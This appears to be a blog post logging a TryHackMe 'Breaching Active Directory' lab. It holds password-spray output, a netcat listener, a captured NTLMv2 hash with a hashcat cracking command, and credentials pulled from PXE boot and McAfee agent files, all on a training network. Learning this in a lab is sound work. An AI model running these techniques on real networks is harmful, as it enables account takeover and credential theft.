Skip to main content

Training Update v0.112

blank
blank

It’s Friday and we are back with another room from THM!

Today we take on the Breaching Active Directory room which is part of the CompTIA Pentest+ pathway which we are coming to the end of now on THM!

blank
blank
blank
blank
blank

sed -i ‘1s|^|nameserver $10.200.26.101\n|’

blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
[*] Starting passwords spray attack using the following password: Changeme123
[-] Failed login with Username: anthony.reynolds
[-] Failed login with Username: samantha.thompson
[-] Failed login with Username: dawn.turner
[-] Failed login with Username: frances.chapman
[-] Failed login with Username: henry.taylor
[-] Failed login with Username: jennifer.wood
[+] Valid credential pair found! Username: hollie.powell Password: Changeme123
[-] Failed login with Username: louise.talbot
[+] Valid credential pair found! Username: heather.smith Password: Changeme123
[-] Failed login with Username: dominic.elliott
[+] Valid credential pair found! Username: gordon.stevens Password: Changeme123
[-] Failed login with Username: alan.jones
[-] Failed login with Username: frank.fletcher
[-] Failed login with Username: maria.sheppard
[-] Failed login with Username: sophie.blackburn
[-] Failed login with Username: dawn.hughes
[-] Failed login with Username: henry.black
[-] Failed login with Username: joanne.davies
[-] Failed login with Username: mark.oconnor
[+] Valid credential pair found! Username: georgina.edwards Password: Changeme123
[*] Password spray attack completed, 4 valid credential pairs found
blank
blank
blank
blank
blank
blank
blank
blank

http://printer.za.tryhackme.com/settings.aspx

blank
blank

Got an error –

nc -lvnp 389
nc: Address already in use

blank
blank

sudo tcpdump -SX -i breachad tcp port 389

blank
blank

Password – tryhackmeldappass1@

blank
blank
blank
blank
blank
blank
blank

[SMB] NTLMv2-SSP Client : ::ffff:10.200.26.202
[SMB] NTLMv2-SSP Username : ZA\svcFileCopy
[SMB] NTLMv2-SSP Hash : svcFileCopy::ZA:3c1ddc933951f72e:E8427A01A0814369A778601AC617A5D6:0101000000000000000DC0B7B9C5DB0128C6D710B3251C9900000000020008004C004F005800500001001E00570049004E002D004E00410038004500470036003600370036005700450004003400570049004E002D004E0041003800450047003600360037003600570045002E004C004F00580050002E004C004F00430041004C00030014004C004F00580050002E004C004F00430041004C00050014004C004F00580050002E004C004F00430041004C0007000800000DC0B7B9C5DB0106000400020000000800300030000000000000000000000000200000654D5D2126E7674526BD7ADC2CF6F165A1F55AF466B45B6B174ECDE4AD7C43920A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00350030002E00320034002E0035000000000000000000

hashcat -m 5600 hash.txt passwordlist-1647876320267.txt –force

blank

Password – FPassword1!

blank
blank
blank
blank
blank

http://pxeboot.za.tryhackme.com/

blank
blank
blank
blank
blank
>>>> Finding Bootstrap.ini 
>>>> >>>> DeployRoot = \\THMMDT\MTDBuildLab$ 
>>>> >>>> UserID = svcMDT
>>>> >>>> UserDomain = ZA
>>>> >>>> UserPassword = PXEBootSecure1@
blank
blank
blank
blank
blank

scp [email protected]:C:/ProgramData/McAfee/Agent/DB/ma.db .

blank
blank
blank

This was erroring out alot –

blank

We now know the svcAV user’s password is MyStrongPassword!.

blank
blank
blank

Now we move on to Lateral Movement and Pivoting room on THM!

blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank

Need to do more research, can’t understand why it’s not working.

Will continue Tomorrow/Monday!

blank
blank

Until next time & don’t sleepwalk through life!

Alu a e